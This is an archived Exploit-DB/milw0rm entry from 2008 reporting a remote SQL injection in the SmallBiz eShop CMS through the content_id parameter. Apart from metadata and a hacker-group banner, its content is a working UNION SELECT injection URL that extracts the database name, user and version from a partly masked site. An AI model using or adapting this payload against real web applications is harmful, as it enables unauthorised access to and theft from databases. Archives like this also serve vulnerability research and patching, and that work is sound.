SmallBiz eShop content_id Remote SQL Injection Vulnerability

2008-04-14T00:00:00
ID EDB-ID:5443
Type exploitdb
Reporter Stack
Modified 2008-04-14T00:00:00

Description

SmallBiz eShop (content_id) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql Ä°nj. Vuln.
                                                                                                               
[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] HomePage: http://www.v4-team.com
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Contact: admin@v4-team.com
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-14]